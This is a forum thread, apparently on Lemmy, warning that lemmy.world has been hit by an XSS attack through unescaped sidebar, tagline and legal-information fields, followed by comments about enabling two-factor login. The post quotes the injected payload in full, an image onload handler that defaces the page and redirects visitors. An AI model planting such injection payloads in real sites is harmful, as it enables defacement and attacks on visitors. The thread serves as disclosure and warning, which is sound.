Warning: Some posts on this platform may contain adult material intended for mature audiences only. Viewer discretion is advised. By clicking ‘Continue’, you confirm that you are 18 years or older and consent to viewing explicit content.
# DO NOT OPEN THE “LEGAL” PAGE — lemmy.world is a victim of an XSS attack right
now and the hacker simply injected a JavaScript redirection into the sidebar. It
appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if
this is also true for community sidebars.
[https://sh.itjust.works/pictrs/image/707c0f16-3d5c-4888-b865-34228d968ee6.png]
EDIT: the exploit is also in the tagline that appears on top of the main feed
for status updates, like the following one for SDF Chatter:
[https://sh.itjust.works/pictrs/image/2dc8838f-4611-4b62-92d2-ab45d7b1c560.png]
[https://sh.itjust.works/pictrs/image/9195ec9c-166e-4190-a991-26d218089602.png]
EDIT 2: The legal information field also has that exploit, so that when you go
to the “Legal” page it shows the HTML unescaped, but fortunately (for now) he’s
using double-quotes. "legal_information":" ![\"
onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML =
`\u003Ch1\u003ESite has been seized by Reddit for copyright
infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href =
`https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`},
10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png
\"lw\")
I encourage everyone, but especially mods to enable 2FA on their account. I’ll do up a post tonight with screenshots on exactly how to do this, I realise the lemmy process isn’t as smooth as it could be. Ideally it would present a QR code to scan with with your phone as most other sites do.
I tried doing this but have lost access to my aussie.zone account (same user name). I checked the 2FA box but I couldn’t see the extra setup steps (I think I refreshed the page), so I unchecked the box and saved. I then changed my pw. Now it seems to accept new pw but am getting incorrect 2FA token error. What do I do?
Oh bugger. Sorry, I’ll need to find out how to manually toggle 2FA on your account in the database. I won’t be able to do this until I get home this evening.
You are one of the best admins I’ve met in my coupla decades of internet usage. I love ya work mate and if you ever want a hand from a fellow sysadmin hit me up.
I encourage everyone, but especially mods to enable 2FA on their account. I’ll do up a post tonight with screenshots on exactly how to do this, I realise the lemmy process isn’t as smooth as it could be. Ideally it would present a QR code to scan with with your phone as most other sites do.
I tried doing this but have lost access to my aussie.zone account (same user name). I checked the 2FA box but I couldn’t see the extra setup steps (I think I refreshed the page), so I unchecked the box and saved. I then changed my pw. Now it seems to accept new pw but am getting incorrect 2FA token error. What do I do?
Oh bugger. Sorry, I’ll need to find out how to manually toggle 2FA on your account in the database. I won’t be able to do this until I get home this evening.
Thanks in advance
Try now… think I’ve disabled it on your aussie.zone account.
Thank you, that worked!
Excellent 🙂
You are one of the best admins I’ve met in my coupla decades of internet usage. I love ya work mate and if you ever want a hand from a fellow sysadmin hit me up.
aww thanks 😇